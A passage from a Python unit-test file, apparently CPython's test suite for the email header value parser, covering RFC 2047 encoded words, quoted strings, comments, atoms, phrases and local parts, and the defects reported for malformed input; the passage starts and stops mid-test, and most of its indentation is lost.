'=?us-ascii?q?first?= =?utf-8?q?second?=',
'first',
'first',
[],
' =?utf-8?q?second?=')
def test_get_encoded_word_gets_first_even_if_no_space(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first?==?utf-8?q?second?=',
'first',
'first',
[],
'=?utf-8?q?second?=')
def test_get_encoded_word_sets_extra_attributes(self):
ew = self._test_get_x(parser.get_encoded_word,
'=?us-ascii*jive?q?first_second?=',
'first second',
'first second',
[],
'')
self.assertEqual(ew.encoded, '=?us-ascii*jive?q?first_second?=')
self.assertEqual(ew.charset, 'us-ascii')
self.assertEqual(ew.lang, 'jive')
def test_get_encoded_word_lang_default_is_blank(self):
ew = self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first_second?=',
'first second',
'first second',
[],
'')
self.assertEqual(ew.encoded, '=?us-ascii?q?first_second?=')
self.assertEqual(ew.charset, 'us-ascii')
self.assertEqual(ew.lang, '')
def test_get_encoded_word_non_printable_defect(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?first\x02second?=',
'first\x02second',
'first\x02second',
[errors.NonPrintableDefect],
'')
def test_get_encoded_word_leading_internal_space(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?=20foo?=',
' foo',
' foo',
[],
'')
def test_get_encoded_word_quopri_utf_escape_follows_cte(self):
# Issue 18044
self._test_get_x(parser.get_encoded_word,
'=?utf-8?q?=C3=89ric?=',
'Éric',
'Éric',
[],
'')
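    # The encoded-word tests above exercise the RFC 2047/2231 syntax
    #     =?charset*lang?encoding?encoded-text?=
    # e.g. '=?us-ascii*jive?q?first_second?=' decodes to 'first second' with
    # charset 'us-ascii' and lang 'jive' (in the 'q' encoding an underscore
    # stands for a space, and =XX is a hex-escaped byte).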
# get_unstructured
def _get_unst(self, value):
token = parser.get_unstructured(value)
return token, ''
def test_get_unstructured_null(self):
self._test_get_x(self._get_unst, '', '', '', [], '')
def test_get_unstructured_one_word(self):
self._test_get_x(self._get_unst, 'foo', 'foo', 'foo', [], '')
def test_get_unstructured_normal_phrase(self):
self._test_get_x(self._get_unst, 'foo bar bird',
'foo bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_normal_phrase_with_whitespace(self):
self._test_get_x(self._get_unst, 'foo \t bar bird',
'foo \t bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_leading_whitespace(self):
self._test_get_x(self._get_unst, ' foo bar',
' foo bar',
' foo bar',
[],
'')
def test_get_unstructured_trailing_whitespace(self):
self._test_get_x(self._get_unst, 'foo bar ',
'foo bar ',
'foo bar ',
[],
'')
def test_get_unstructured_leading_and_trailing_whitespace(self):
self._test_get_x(self._get_unst, ' foo bar ',
' foo bar ',
' foo bar ',
[],
'')
def test_get_unstructured_one_valid_ew_no_ws(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?=',
'bar',
'bar',
[],
'')
def test_get_unstructured_one_ew_trailing_ws(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?= ',
'bar ',
'bar ',
[],
'')
def test_get_unstructured_one_valid_ew_trailing_text(self):
self._test_get_x(self._get_unst, '=?us-ascii?q?bar?= bird',
'bar bird',
'bar bird',
[],
'')
def test_get_unstructured_phrase_with_ew_in_middle_of_text(self):
self._test_get_x(self._get_unst, 'foo =?us-ascii?q?bar?= bird',
'foo bar bird',
'foo bar bird',
[],
'')
def test_get_unstructured_phrase_with_two_ew(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= =?us-ascii?q?bird?=',
'foo barbird',
'foo barbird',
[],
'')
def test_get_unstructured_phrase_with_two_ew_trailing_ws(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= =?us-ascii?q?bird?= ',
'foo barbird ',
'foo barbird ',
[],
'')
def test_get_unstructured_phrase_with_ew_with_leading_ws(self):
self._test_get_x(self._get_unst,
' =?us-ascii?q?bar?=',
' bar',
' bar',
[],
'')
def test_get_unstructured_phrase_with_two_ew_extra_ws(self):
self._test_get_x(self._get_unst,
'foo =?us-ascii?q?bar?= \t =?us-ascii?q?bird?=',
'foo barbird',
'foo barbird',
[],
'')
def test_get_unstructured_two_ew_extra_ws_trailing_text(self):
self._test_get_x(self._get_unst,
'=?us-ascii?q?test?= =?us-ascii?q?foo?= val',
'testfoo val',
'testfoo val',
[],
'')
def test_get_unstructured_ew_with_internal_ws(self):
self._test_get_x(self._get_unst,
'=?iso-8859-1?q?hello=20world?=',
'hello world',
'hello world',
[],
'')
def test_get_unstructured_ew_with_internal_leading_ws(self):
self._test_get_x(self._get_unst,
' =?us-ascii?q?=20test?= =?us-ascii?q?=20foo?= val',
' test foo val',
' test foo val',
[],
'')
    def test_get_unstructured_invalid_ew(self):
self._test_get_x(self._get_unst,
'=?test val',
'=?test val',
'=?test val',
[],
'')
def test_get_unstructured_undecodable_bytes(self):
self._test_get_x(self._get_unst,
b'test \xACfoo val'.decode('ascii', 'surrogateescape'),
'test \uDCACfoo val',
'test \uDCACfoo val',
[errors.UndecodableBytesDefect],
'')
def test_get_unstructured_undecodable_bytes_in_EW(self):
self._test_get_x(self._get_unst,
(b'=?us-ascii?q?=20test?= =?us-ascii?q?=20\xACfoo?='
b' val').decode('ascii', 'surrogateescape'),
' test \uDCACfoo val',
' test \uDCACfoo val',
[errors.UndecodableBytesDefect]*2,
'')
def test_get_unstructured_missing_base64_padding(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dmk?=',
'vi',
'vi',
[errors.InvalidBase64PaddingDefect],
'')
def test_get_unstructured_invalid_base64_character(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dm\x01k===?=',
'vi',
'vi',
[errors.InvalidBase64CharactersDefect],
'')
def test_get_unstructured_invalid_base64_character_and_bad_padding(self):
self._test_get_x(self._get_unst,
'=?utf-8?b?dm\x01k?=',
'vi',
'vi',
[errors.InvalidBase64CharactersDefect,
errors.InvalidBase64PaddingDefect],
'')
def test_get_unstructured_no_whitespace_between_ews(self):
self._test_get_x(self._get_unst,
'=?utf-8?q?foo?==?utf-8?q?bar?=',
'foobar',
'foobar',
[errors.InvalidHeaderDefect],
'')
# get_qp_ctext
def test_get_qp_ctext_only(self):
ptext = self._test_get_x(parser.get_qp_ctext,
'foobar', 'foobar', ' ', [], '')
self.assertEqual(ptext.token_type, 'ptext')
def test_get_qp_ctext_all_printables(self):
with_qp = self.rfc_printable_ascii.replace('\\', '\\\\')
        with_qp = with_qp.replace('(', r'\(')
with_qp = with_qp.replace(')', r'\)')
ptext = self._test_get_x(parser.get_qp_ctext,
with_qp, self.rfc_printable_ascii, ' ', [], '')
def test_get_qp_ctext_two_words_gets_first(self):
self._test_get_x(parser.get_qp_ctext,
'foo de', 'foo', ' ', [], ' de')
def test_get_qp_ctext_following_wsp_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo \t\tde', 'foo', ' ', [], ' \t\tde')
def test_get_qp_ctext_up_to_close_paren_only(self):
self._test_get_x(parser.get_qp_ctext,
'foo)', 'foo', ' ', [], ')')
def test_get_qp_ctext_wsp_before_close_paren_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo )', 'foo', ' ', [], ' )')
def test_get_qp_ctext_close_paren_mid_word(self):
self._test_get_x(parser.get_qp_ctext,
'foo)bar', 'foo', ' ', [], ')bar')
def test_get_qp_ctext_up_to_open_paren_only(self):
self._test_get_x(parser.get_qp_ctext,
'foo(', 'foo', ' ', [], '(')
def test_get_qp_ctext_wsp_before_open_paren_preserved(self):
self._test_get_x(parser.get_qp_ctext,
'foo (', 'foo', ' ', [], ' (')
def test_get_qp_ctext_open_paren_mid_word(self):
self._test_get_x(parser.get_qp_ctext,
'foo(bar', 'foo', ' ', [], '(bar')
def test_get_qp_ctext_non_printables(self):
ptext = self._test_get_x(parser.get_qp_ctext,
'foo\x00bar)', 'foo\x00bar', ' ',
[errors.NonPrintableDefect], ')')
self.assertEqual(ptext.defects[0].non_printables[0], '\x00')
# get_qcontent
def test_get_qcontent_only(self):
ptext = self._test_get_x(parser.get_qcontent,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(ptext.token_type, 'ptext')
def test_get_qcontent_all_printables(self):
with_qp = self.rfc_printable_ascii.replace('\\', '\\\\')
        with_qp = with_qp.replace('"', r'\"')
ptext = self._test_get_x(parser.get_qcontent, with_qp,
self.rfc_printable_ascii,
self.rfc_printable_ascii, [], '')
def test_get_qcontent_two_words_gets_first(self):
self._test_get_x(parser.get_qcontent,
'foo de', 'foo', 'foo', [], ' de')
def test_get_qcontent_following_wsp_preserved(self):
self._test_get_x(parser.get_qcontent,
'foo \t\tde', 'foo', 'foo', [], ' \t\tde')
def test_get_qcontent_up_to_dquote_only(self):
self._test_get_x(parser.get_qcontent,
'foo"', 'foo', 'foo', [], '"')
def test_get_qcontent_wsp_before_close_paren_preserved(self):
self._test_get_x(parser.get_qcontent,
'foo "', 'foo', 'foo', [], ' "')
def test_get_qcontent_close_paren_mid_word(self):
self._test_get_x(parser.get_qcontent,
'foo"bar', 'foo', 'foo', [], '"bar')
def test_get_qcontent_non_printables(self):
ptext = self._test_get_x(parser.get_qcontent,
'foo\x00fg"', 'foo\x00fg', 'foo\x00fg',
[errors.NonPrintableDefect], '"')
self.assertEqual(ptext.defects[0].non_printables[0], '\x00')
# get_atext
def test_get_atext_only(self):
atext = self._test_get_x(parser.get_atext,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(atext.token_type, 'atext')
def test_get_atext_all_atext(self):
atext = self._test_get_x(parser.get_atext, self.rfc_atext_chars,
self.rfc_atext_chars,
self.rfc_atext_chars, [], '')
def test_get_atext_two_words_gets_first(self):
self._test_get_x(parser.get_atext,
'foo bar', 'foo', 'foo', [], ' bar')
def test_get_atext_following_wsp_preserved(self):
self._test_get_x(parser.get_atext,
'foo \t\tbar', 'foo', 'foo', [], ' \t\tbar')
def test_get_atext_up_to_special(self):
self._test_get_x(parser.get_atext,
'foo@bar', 'foo', 'foo', [], '@bar')
def test_get_atext_non_printables(self):
atext = self._test_get_x(parser.get_atext,
'foo\x00bar(', 'foo\x00bar', 'foo\x00bar',
[errors.NonPrintableDefect], '(')
self.assertEqual(atext.defects[0].non_printables[0], '\x00')
# get_bare_quoted_string
def test_get_bare_quoted_string_only(self):
bqs = self._test_get_x(parser.get_bare_quoted_string,
'"foo"', '"foo"', 'foo', [], '')
self.assertEqual(bqs.token_type, 'bare-quoted-string')
def test_get_bare_quoted_string_must_start_with_dquote(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_bare_quoted_string('foo"')
with self.assertRaises(errors.HeaderParseError):
parser.get_bare_quoted_string(' "foo"')
def test_get_bare_quoted_string_following_wsp_preserved(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo"\t bar', '"foo"', 'foo', [], '\t bar')
def test_get_bare_quoted_string_multiple_words(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo bar moo"', '"foo bar moo"', 'foo bar moo', [], '')
def test_get_bare_quoted_string_multiple_words_wsp_preserved(self):
self._test_get_x(parser.get_bare_quoted_string,
'" foo moo\t"', '" foo moo\t"', ' foo moo\t', [], '')
def test_get_bare_quoted_string_end_dquote_mid_word(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo"bar', '"foo"', 'foo', [], 'bar')
def test_get_bare_quoted_string_quoted_dquote(self):
self._test_get_x(parser.get_bare_quoted_string,
r'"foo\"in"a', r'"foo\"in"', 'foo"in', [], 'a')
def test_get_bare_quoted_string_non_printables(self):
self._test_get_x(parser.get_bare_quoted_string,
'"a\x01a"', '"a\x01a"', 'a\x01a',
[errors.NonPrintableDefect], '')
def test_get_bare_quoted_string_no_end_dquote(self):
self._test_get_x(parser.get_bare_quoted_string,
'"foo', '"foo"', 'foo',
[errors.InvalidHeaderDefect], '')
self._test_get_x(parser.get_bare_quoted_string,
'"foo ', '"foo "', 'foo ',
[errors.InvalidHeaderDefect], '')
def test_get_bare_quoted_string_empty_quotes(self):
self._test_get_x(parser.get_bare_quoted_string,
'""', '""', '', [], '')
    # Issue 16983: apply Postel's law to some bad encoding.
def test_encoded_word_inside_quotes(self):
self._test_get_x(parser.get_bare_quoted_string,
'"=?utf-8?Q?not_really_valid?="',
'"not really valid"',
'not really valid',
[errors.InvalidHeaderDefect],
'')
# get_comment
def test_get_comment_only(self):
comment = self._test_get_x(parser.get_comment,
'(comment)', '(comment)', ' ', [], '', ['comment'])
self.assertEqual(comment.token_type, 'comment')
def test_get_comment_must_start_with_paren(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_comment('foo"')
with self.assertRaises(errors.HeaderParseError):
parser.get_comment(' (foo"')
def test_get_comment_following_wsp_preserved(self):
self._test_get_x(parser.get_comment,
'(comment) \t', '(comment)', ' ', [], ' \t', ['comment'])
def test_get_comment_multiple_words(self):
self._test_get_x(parser.get_comment,
'(foo bar) \t', '(foo bar)', ' ', [], ' \t', ['foo bar'])
def test_get_comment_multiple_words_wsp_preserved(self):
self._test_get_x(parser.get_comment,
'( foo bar\t ) \t', '( foo bar\t )', ' ', [], ' \t',
[' foo bar\t '])
def test_get_comment_end_paren_mid_word(self):
self._test_get_x(parser.get_comment,
'(foo)bar', '(foo)', ' ', [], 'bar', ['foo'])
def test_get_comment_quoted_parens(self):
self._test_get_x(parser.get_comment,
            r'(foo\) \(\)bar)', r'(foo\) \(\)bar)', ' ', [], '', ['foo) ()bar'])
def test_get_comment_non_printable(self):
self._test_get_x(parser.get_comment,
'(foo\x7Fbar)', '(foo\x7Fbar)', ' ',
[errors.NonPrintableDefect], '', ['foo\x7Fbar'])
def test_get_comment_no_end_paren(self):
self._test_get_x(parser.get_comment,
'(foo bar', '(foo bar)', ' ',
[errors.InvalidHeaderDefect], '', ['foo bar'])
self._test_get_x(parser.get_comment,
'(foo bar ', '(foo bar )', ' ',
[errors.InvalidHeaderDefect], '', ['foo bar '])
def test_get_comment_nested_comment(self):
comment = self._test_get_x(parser.get_comment,
'(foo(bar))', '(foo(bar))', ' ', [], '', ['foo(bar)'])
self.assertEqual(comment[1].content, 'bar')
def test_get_comment_nested_comment_wsp(self):
comment = self._test_get_x(parser.get_comment,
'(foo ( bar ) )', '(foo ( bar ) )', ' ', [], '', ['foo ( bar ) '])
self.assertEqual(comment[2].content, ' bar ')
def test_get_comment_empty_comment(self):
self._test_get_x(parser.get_comment,
'()', '()', ' ', [], '', [''])
def test_get_comment_multiple_nesting(self):
comment = self._test_get_x(parser.get_comment,
'(((((foo)))))', '(((((foo)))))', ' ', [], '', ['((((foo))))'])
for i in range(4, 0, -1):
self.assertEqual(comment[0].content, '('*(i-1)+'foo'+')'*(i-1))
comment = comment[0]
self.assertEqual(comment.content, 'foo')
def test_get_comment_missing_end_of_nesting(self):
self._test_get_x(parser.get_comment,
'(((((foo)))', '(((((foo)))))', ' ',
[errors.InvalidHeaderDefect]*2, '', ['((((foo))))'])
def test_get_comment_qs_in_nested_comment(self):
comment = self._test_get_x(parser.get_comment,
            r'(foo (b\)))', r'(foo (b\)))', ' ', [], '', [r'foo (b\))'])
self.assertEqual(comment[2].content, 'b)')
# get_cfws
def test_get_cfws_only_ws(self):
cfws = self._test_get_x(parser.get_cfws,
' \t \t', ' \t \t', ' ', [], '', [])
self.assertEqual(cfws.token_type, 'cfws')
def test_get_cfws_only_comment(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo)', '(foo)', ' ', [], '', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_only_mixed(self):
cfws = self._test_get_x(parser.get_cfws,
' (foo ) ( bar) ', ' (foo ) ( bar) ', ' ', [], '',
['foo ', ' bar'])
self.assertEqual(cfws[1].content, 'foo ')
self.assertEqual(cfws[3].content, ' bar')
def test_get_cfws_ends_at_non_leader(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo) bar', '(foo) ', ' ', [], 'bar', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_ends_at_non_printable(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo) \x07', '(foo) ', ' ', [], '\x07', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_non_printable_in_comment(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo \x07) "test"', '(foo \x07) ', ' ',
[errors.NonPrintableDefect], '"test"', ['foo \x07'])
self.assertEqual(cfws[0].content, 'foo \x07')
def test_get_cfws_header_ends_in_comment(self):
cfws = self._test_get_x(parser.get_cfws,
' (foo ', ' (foo )', ' ',
[errors.InvalidHeaderDefect], '', ['foo '])
self.assertEqual(cfws[1].content, 'foo ')
def test_get_cfws_multiple_nested_comments(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo (bar)) ((a)(a))', '(foo (bar)) ((a)(a))', ' ', [],
'', ['foo (bar)', '(a)(a)'])
self.assertEqual(cfws[0].comments, ['foo (bar)'])
self.assertEqual(cfws[2].comments, ['(a)(a)'])
# get_quoted_string
def test_get_quoted_string_only(self):
qs = self._test_get_x(parser.get_quoted_string,
'"bob"', '"bob"', 'bob', [], '')
self.assertEqual(qs.token_type, 'quoted-string')
self.assertEqual(qs.quoted_value, '"bob"')
self.assertEqual(qs.content, 'bob')
def test_get_quoted_string_with_wsp(self):
qs = self._test_get_x(parser.get_quoted_string,
'\t "bob" ', '\t "bob" ', ' bob ', [], '')
self.assertEqual(qs.quoted_value, ' "bob" ')
self.assertEqual(qs.content, 'bob')
def test_get_quoted_string_with_comments_and_wsp(self):
qs = self._test_get_x(parser.get_quoted_string,
' (foo) "bob"(bar)', ' (foo) "bob"(bar)', ' bob ', [], '')
self.assertEqual(qs[0][1].content, 'foo')
self.assertEqual(qs[2][0].content, 'bar')
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_with_multiple_comments(self):
qs = self._test_get_x(parser.get_quoted_string,
' (foo) (bar) "bob"(bird)', ' (foo) (bar) "bob"(bird)', ' bob ',
[], '')
self.assertEqual(qs[0].comments, ['foo', 'bar'])
self.assertEqual(qs[2].comments, ['bird'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_non_printable_in_comment(self):
qs = self._test_get_x(parser.get_quoted_string,
' (\x0A) "bob"', ' (\x0A) "bob"', ' bob',
[errors.NonPrintableDefect], '')
self.assertEqual(qs[0].comments, ['\x0A'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob"')
def test_get_quoted_string_non_printable_in_qcontent(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "a\x0B"', ' (a) "a\x0B"', ' a\x0B',
[errors.NonPrintableDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'a\x0B')
self.assertEqual(qs.quoted_value, ' "a\x0B"')
def test_get_quoted_string_internal_ws(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "foo bar "', ' (a) "foo bar "', ' foo bar ',
[], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'foo bar ')
self.assertEqual(qs.quoted_value, ' "foo bar "')
def test_get_quoted_string_header_ends_in_comment(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "bob" (a', ' (a) "bob" (a)', ' bob ',
[errors.InvalidHeaderDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs[2].comments, ['a'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_header_ends_in_qcontent(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "bob', ' (a) "bob"', ' bob',
[errors.InvalidHeaderDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob"')
def test_get_quoted_string_no_quoted_string(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_quoted_string(' (ab) xyz')
def test_get_quoted_string_qs_ends_at_noncfws(self):
qs = self._test_get_x(parser.get_quoted_string,
'\t "bob" fee', '\t "bob" ', ' bob ', [], 'fee')
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
# get_atom
def test_get_atom_only(self):
atom = self._test_get_x(parser.get_atom,
'bob', 'bob', 'bob', [], '')
self.assertEqual(atom.token_type, 'atom')
def test_get_atom_with_wsp(self):
self._test_get_x(parser.get_atom,
'\t bob ', '\t bob ', ' bob ', [], '')
def test_get_atom_with_comments_and_wsp(self):
atom = self._test_get_x(parser.get_atom,
' (foo) bob(bar)', ' (foo) bob(bar)', ' bob ', [], '')
self.assertEqual(atom[0][1].content, 'foo')
self.assertEqual(atom[2][0].content, 'bar')
def test_get_atom_with_multiple_comments(self):
atom = self._test_get_x(parser.get_atom,
' (foo) (bar) bob(bird)', ' (foo) (bar) bob(bird)', ' bob ',
[], '')
self.assertEqual(atom[0].comments, ['foo', 'bar'])
self.assertEqual(atom[2].comments, ['bird'])
def test_get_atom_non_printable_in_comment(self):
atom = self._test_get_x(parser.get_atom,
' (\x0A) bob', ' (\x0A) bob', ' bob',
[errors.NonPrintableDefect], '')
self.assertEqual(atom[0].comments, ['\x0A'])
def test_get_atom_non_printable_in_atext(self):
atom = self._test_get_x(parser.get_atom,
' (a) a\x0B', ' (a) a\x0B', ' a\x0B',
[errors.NonPrintableDefect], '')
self.assertEqual(atom[0].comments, ['a'])
def test_get_atom_header_ends_in_comment(self):
atom = self._test_get_x(parser.get_atom,
' (a) bob (a', ' (a) bob (a)', ' bob ',
[errors.InvalidHeaderDefect], '')
self.assertEqual(atom[0].comments, ['a'])
self.assertEqual(atom[2].comments, ['a'])
def test_get_atom_no_atom(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_atom(' (ab) ')
def test_get_atom_no_atom_before_special(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_atom(' (ab) @')
def test_get_atom_atom_ends_at_special(self):
atom = self._test_get_x(parser.get_atom,
' (foo) bob(bar) @bang', ' (foo) bob(bar) ', ' bob ', [], '@bang')
self.assertEqual(atom[0].comments, ['foo'])
self.assertEqual(atom[2].comments, ['bar'])
def test_get_atom_atom_ends_at_noncfws(self):
self._test_get_x(parser.get_atom,
'bob fred', 'bob ', 'bob ', [], 'fred')
def test_get_atom_rfc2047_atom(self):
self._test_get_x(parser.get_atom,
'=?utf-8?q?=20bob?=', ' bob', ' bob', [], '')
# get_dot_atom_text
def test_get_dot_atom_text(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo.bar.bang', 'foo.bar.bang', 'foo.bar.bang', [], '')
self.assertEqual(dot_atom_text.token_type, 'dot-atom-text')
self.assertEqual(len(dot_atom_text), 5)
def test_get_dot_atom_text_lone_atom_is_valid(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo', 'foo', 'foo', [], '')
def test_get_dot_atom_text_raises_on_leading_dot(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('.foo.bar')
def test_get_dot_atom_text_raises_on_trailing_dot(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('foo.bar.')
def test_get_dot_atom_text_raises_on_leading_non_atext(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text(' foo.bar')
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('@foo.bar')
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('"foo.bar"')
def test_get_dot_atom_text_trailing_text_preserved(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo@bar', 'foo', 'foo', [], '@bar')
def test_get_dot_atom_text_trailing_ws_preserved(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo .bar', 'foo', 'foo', [], ' .bar')
# get_dot_atom
def test_get_dot_atom_only(self):
dot_atom = self._test_get_x(parser.get_dot_atom,
'foo.bar.bing', 'foo.bar.bing', 'foo.bar.bing', [], '')
self.assertEqual(dot_atom.token_type, 'dot-atom')
self.assertEqual(len(dot_atom), 1)
def test_get_dot_atom_with_wsp(self):
self._test_get_x(parser.get_dot_atom,
'\t foo.bar.bing ', '\t foo.bar.bing ', ' foo.bar.bing ', [], '')
def test_get_dot_atom_with_comments_and_wsp(self):
self._test_get_x(parser.get_dot_atom,
' (sing) foo.bar.bing (here) ', ' (sing) foo.bar.bing (here) ',
' foo.bar.bing ', [], '')
def test_get_dot_atom_space_ends_dot_atom(self):
self._test_get_x(parser.get_dot_atom,
' (sing) foo.bar .bing (here) ', ' (sing) foo.bar ',
' foo.bar ', [], '.bing (here) ')
def test_get_dot_atom_no_atom_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) ')
def test_get_dot_atom_leading_dot_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) .bar')
def test_get_dot_atom_two_dots_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom('bar..bang')
def test_get_dot_atom_trailing_dot_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) bar.bang. foo')
def test_get_dot_atom_rfc2047_atom(self):
self._test_get_x(parser.get_dot_atom,
'=?utf-8?q?=20bob?=', ' bob', ' bob', [], '')
# get_word (if this were black box we'd repeat all the qs/atom tests)
def test_get_word_atom_yields_atom(self):
word = self._test_get_x(parser.get_word,
' (foo) bar (bang) :ah', ' (foo) bar (bang) ', ' bar ', [], ':ah')
self.assertEqual(word.token_type, 'atom')
self.assertEqual(word[0].token_type, 'cfws')
def test_get_word_qs_yields_qs(self):
word = self._test_get_x(parser.get_word,
'"bar " (bang) ah', '"bar " (bang) ', 'bar ', [], 'ah')
self.assertEqual(word.token_type, 'quoted-string')
self.assertEqual(word[0].token_type, 'bare-quoted-string')
self.assertEqual(word[0].value, 'bar ')
self.assertEqual(word.content, 'bar ')
def test_get_word_ends_at_dot(self):
self._test_get_x(parser.get_word,
'foo.', 'foo', 'foo', [], '.')
# get_phrase
def test_get_phrase_simple(self):
phrase = self._test_get_x(parser.get_phrase,
'"Fred A. Johnson" is his name, oh.',
'"Fred A. Johnson" is his name',
'Fred A. Johnson is his name',
[],
', oh.')
self.assertEqual(phrase.token_type, 'phrase')
def test_get_phrase_complex(self):
phrase = self._test_get_x(parser.get_phrase,
' (A) bird (in (my|your)) "hand " is messy\t<>\t',
' (A) bird (in (my|your)) "hand " is messy\t',
' bird hand is messy ',
[],
'<>\t')
self.assertEqual(phrase[0][0].comments, ['A'])
self.assertEqual(phrase[0][2].comments, ['in (my|your)'])
def test_get_phrase_obsolete(self):
phrase = self._test_get_x(parser.get_phrase,
'Fred A.(weird).O Johnson',
'Fred A.(weird).O Johnson',
'Fred A. .O Johnson',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(phrase), 7)
self.assertEqual(phrase[3].comments, ['weird'])
    def test_get_phrase_must_start_with_word(self):
phrase = self._test_get_x(parser.get_phrase,
'(even weirder).name',
'(even weirder).name',
' .name',
[errors.InvalidHeaderDefect] + [errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(phrase), 3)
self.assertEqual(phrase[0].comments, ['even weirder'])
def test_get_phrase_ending_with_obsolete(self):
phrase = self._test_get_x(parser.get_phrase,
'simple phrase.(with trailing comment):boo',
'simple phrase.(with trailing comment)',
'simple phrase. ',
[errors.ObsoleteHeaderDefect]*2,
':boo')
self.assertEqual(len(phrase), 4)
self.assertEqual(phrase[3].comments, ['with trailing comment'])
    def test_get_phrase_cfws_only_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_phrase(' (foo) ')
# get_local_part
def test_get_local_part_simple(self):
local_part = self._test_get_x(parser.get_local_part,
'dinsdale@python.org', 'dinsdale', 'dinsdale', [], '@python.org')
self.assertEqual(local_part.token_type, 'local-part')
self.assertEqual(local_part.local_part, 'dinsdale')
def test_get_local_part_with_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'Fred.A.Johnson@python.org',
'Fred.A.Johnson',
'Fred.A.Johnson',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_with_whitespace(self):
local_part = self._test_get_x(parser.get_local_part,
' Fred.A.Johnson @python.org',
' Fred.A.Johnson ',
' Fred.A.Johnson ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_with_cfws(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo) Fred.A.Johnson (bar (bird)) @python.org',
' (foo) Fred.A.Johnson (bar (bird)) ',
' Fred.A.Johnson ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
self.assertEqual(local_part[0][0].comments, ['foo'])
self.assertEqual(local_part[0][2].comments, ['bar (bird)'])
def test_get_local_part_simple_quoted(self):
local_part = self._test_get_x(parser.get_local_part,
'"dinsdale"@python.org', '"dinsdale"', '"dinsdale"', [], '@python.org')
self.assertEqual(local_part.token_type, 'local-part')
self.assertEqual(local_part.local_part, 'dinsdale')
def test_get_local_part_with_quoted_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'"Fred.A.Johnson"@python.org',
'"Fred.A.Johnson"',
'"Fred.A.Johnson"',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_quoted_with_whitespace(self):
local_part = self._test_get_x(parser.get_local_part,
' "Fred A. Johnson" @python.org',
' "Fred A. Johnson" ',
' "Fred A. Johnson" ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred A. Johnson')
def test_get_local_part_quoted_with_cfws(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo) " Fred A. Johnson " (bar (bird)) @python.org',
' (foo) " Fred A. Johnson " (bar (bird)) ',
